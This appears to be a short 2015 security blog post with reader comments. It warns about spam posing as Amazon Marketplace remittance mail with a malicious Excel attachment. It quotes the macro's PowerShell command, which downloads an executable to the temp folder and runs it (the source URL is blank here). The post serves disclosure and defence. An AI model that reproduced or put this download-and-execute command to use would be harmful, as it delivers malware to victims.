Sponsored by..

Friday 13 February 2015

Malware spam: "Amazon Marketplace [delivery@amazon.uk]" / "Remittance [Report ID:34355-6014742]"

This email with no body text comes with a malicious Excel attachment:

From:    Amazon Marketplace [delivery@amazon.uk]
Date:    13 February 2015 at 14:34
Subject:    RE: Remittance [Report ID:34355-6014742]
I have seen just a single sample of this with an attachment D87278F02E.XLS which has a zero detection rate at VirusTotal. This Excel spreadsheet contains this malicious Excel macro [pastebin] which attempts to execute the following command:
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('','%TEMP%\oUhjidsf.exe');Start-Process '%TEMP%\oUhjidsf.exe';
The downloaded file dhoei.exe is exactly the same as used in this spam run.


jjee said...

Due to some reasons I was inattentively and have opened the excel attachment in the mail. Fortunately "oUhjidsf.exe" downloaded by the embeded macro failed to execute due to OS version incompatibilities:-)

see the Windows Logs Message below:
The program or feature "\??\C:\Users\abcdefg\AppData\Local\Temp\oUhjidsf.exe" cannot start or run due to incompatibity with 64-bit versions of Windows. Please contact the software vendor to ask if a 64-bit Windows compatible version is available.

Jenncat said...

How do I get rid of this?